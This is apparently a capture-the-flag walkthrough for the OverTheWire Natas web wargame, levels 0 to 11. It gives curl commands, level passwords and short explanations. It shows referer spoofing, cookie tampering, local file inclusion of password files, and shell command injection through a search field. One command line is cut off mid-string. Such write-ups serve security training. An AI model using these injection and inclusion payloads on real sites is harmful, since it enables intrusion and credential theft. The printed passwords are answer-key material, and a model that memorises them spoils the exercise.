URL: http://overthewire.org/wargames/natas/ Type: Web
curl -s -u natas0:natas0 http://natas0.natas.labs.overthewire.org
The password is hidden in the source-code.
curl -s -u natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org
The password is hidden in the source-code.
curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org
There's a new image on the page, under the drectiory /files there's a txt file with a secret.
curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/
curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/users.txt | grep natas3 | cut -d":" -f 2
curl -s -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org
There's a hint in the source-code: Google Search: https://www.google.com/search?q=site:natas3.natas.labs.overthewire.org and there's a /s3cr3t path in the results. The path contains a users.txt file with the password.
curl -s -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
curl -s -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org
Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/" So we add a referer in the headers and we get the password:
curl -s -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org -H 'Referer: http://natas5.natas.labs.overthewire.org/'
curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org
The page says that you are not logged in. Checked the responce headers:
curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -I
...
Set-Cookie: loggedin=0
...
And it seems that the cookie loggedin is zero. We will now set it to 1 and retry.
curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -H 'Cookie: loggedin=1' | grep password
curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org
We see a submit form as well as index-source.html. That page has inclusion of includes/secret.inc file to compare the secret so we do that:
curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/index-source.html
curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
When we obtained the secret we submit it through the form:
curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/ -d 'secret=FOEIUWGHFEEUHOFUOIU&submit=Submit'
curl -s -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org
We get a hint: As well as the page has inclusion: index.php?page=home So we try:
curl -s -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
curl -s -u natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe http://natas8.natas.labs.overthewire.org
And we have again a view-source page with the following script:
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
So what we need to do is to reverse the encodeSecret function and parse the encodedSecret string.
php -r 'echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c3156695
oubWYf2kBq
curl -s -u natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe http://natas8.natas.labs.overthewire.org -d 'secret=oubWYf2kBq&submit=Submit'
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org
We can notice that there's again a view-source which has an option to inject a command:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
So if we simply provide: ; SHEL_COMMAND && to the input we are going to be able to execute whatever we want. Of course this runs in chroot so nothing much can be done, but we can read lot's of files. After a bit of search I've found an interesting file /etc/natas_webpass/natas10 owned by the current user group (natas9).
# find / -type f -group natas9 # to find all files owned by our group
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;find / -type f -group natas9 &&' -d 'submit=Search'
# get the file contents
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;cat /etc/natas_webpass/natas10 &&' -d 'submit=Search'
curl -s -u natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu http://natas10.natas.labs.overthewire.org
Again we have a view-source with a following contents:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
From the previous level we can notice that there's a shift in user-group ownership of the password files. Therefore we need to access the files for natas11 from here.
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;ls -ltrah /etc/natas_webpass/natas11 &&' -d 'submit=Search'
# Output:
-r--r----- 1 natas11 natas10 33 Dec 20 2016 /etc/natas_webpass/natas11
So we simply try to grep the contents of that file using the current level access:
curl -s -u natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu http://natas10.natas.labs.overthewire.org -d 'submit=Search' --data-urlencode 'needle=. /etc/natas_webpass/natas11 #'
curl -s -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org